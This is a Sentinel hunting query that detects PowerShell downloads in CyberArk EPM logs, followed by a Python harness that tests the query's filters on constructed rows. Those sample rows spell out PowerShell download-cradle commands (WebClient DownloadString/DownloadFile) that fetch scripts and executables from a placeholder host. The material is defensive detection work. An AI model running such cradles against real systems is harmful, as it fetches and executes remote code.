Solutions/CyberArkEPM/Hunting Queries/CyberArkEPMPowershellDownloads.yaml
id: 576cac40-d6f5-4ef9-9c3d-013b94656bea
name: CyberArkEPM - Powershell downloads
description: |
  'Query shows powershell downloads.'
severity: Medium
requiredDataConnectors:
  - connectorId: CyberArkEPM
    dataTypes:
      - CyberArkEPM
tactics:
  - Execution
relevantTechniques:
  - T1204
  - T1059
query: |
  CyberArkEPM
  | where TimeGenerated > ago(24h)
  | where ActingProcessFileInternalName =~ 'powershell.exe'
  | where ActingProcessCommandLine has_any ('WebClient', 'DownloadString', 'DownloadFile')
  | extend AccountCustomEntity = ActorUsername
entityMappings:
  - entityType: Account
    fieldMappings:
      - identifier: Name
        columnName: AccountCustomEntity
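As an added example (not part of this query file or the Sentinel content), the following Python reproduces the query's filter logic over constructed CyberArkEPM-shaped rows, so the behaviour of `=~`, `has_any` and the `ago(24h)` window can be checked offline before the hunt is run. Sample values, `example.invalid` URLs and the `pwsh.exe` internal name are constructed, and `has_any` term matching is an approximation of KQL's term semantics.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample rows shaped like the CyberArkEPM columns the query touches
# (hypothetical values, not real telemetry). NOW stands in for query evaluation time.
NOW = datetime(2024, 1, 15, 12, 0, tzinfo=timezone.utc)
SAMPLE_EVENTS = [
    # Hit: =~ compares the internal name case-insensitively; command line carries the terms.
    {"TimeGenerated": NOW - timedelta(hours=2), "ActingProcessFileInternalName": "POWERSHELL.EXE",
     "ActingProcessCommandLine": "powershell -nop -c (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1')",
     "ActorUsername": "CORP\\alice"},
    # Same pattern but 30h old: excluded by the ago(24h) window.
    {"TimeGenerated": NOW - timedelta(hours=30), "ActingProcessFileInternalName": "powershell.exe",
     "ActingProcessCommandLine": "powershell (New-Object Net.WebClient).DownloadFile('https://example.invalid/x.exe','x.exe')",
     "ActorUsername": "CORP\\bob"},
    # Benign admin use: none of the three terms present.
    {"TimeGenerated": NOW - timedelta(minutes=10), "ActingProcessFileInternalName": "powershell.exe",
     "ActingProcessCommandLine": "powershell Get-Service | Where-Object Status -eq Running",
     "ActorUsername": "CORP\\carol"},
    # Different host internal name (constructed): outside the query's =~ 'powershell.exe' scope.
    {"TimeGenerated": NOW - timedelta(minutes=3), "ActingProcessFileInternalName": "pwsh.exe",
     "ActingProcessCommandLine": "pwsh -c (New-Object Net.WebClient).DownloadString('https://example.invalid/b.ps1')",
     "ActorUsername": "CORP\\dave"},
]
DOWNLOAD_TERMS = ("WebClient", "DownloadString", "DownloadFile")

def has_any(text, terms):
    """Approximate KQL has_any: a term must equal a whole alphanumeric token, case-insensitively
    (so 'DownloadString' does not match the token 'DownloadStringAsync', unlike a substring check)."""
    tokens = {tok.lower() for tok in re.findall(r"[A-Za-z0-9]+", text)}
    return any(term.lower() in tokens for term in terms)

def run_hunt(events, now=NOW, window=timedelta(hours=24)):
    """Mirror the query: 24h window, =~ on the internal name, has_any on the command line,
    then extend AccountCustomEntity from ActorUsername. Returns the matching rows."""
    hits = []
    for ev in events:
        if ev["TimeGenerated"] <= now - window:  # where TimeGenerated > ago(24h)
            continue
        if ev["ActingProcessFileInternalName"].lower() != "powershell.exe":  # =~ is case-insensitive
            continue
        if not has_any(ev["ActingProcessCommandLine"], DOWNLOAD_TERMS):
            continue
        hits.append({**ev, "AccountCustomEntity": ev["ActorUsername"]})
    return hits

if __name__ == "__main__":
    for hit in run_hunt(SAMPLE_EVENTS):
        print(hit["AccountCustomEntity"], "->", hit["ActingProcessCommandLine"])
```

Only the first constructed row survives all three filters; the `pwsh.exe` row shows that hosts with a different internal name fall outside this query's coverage.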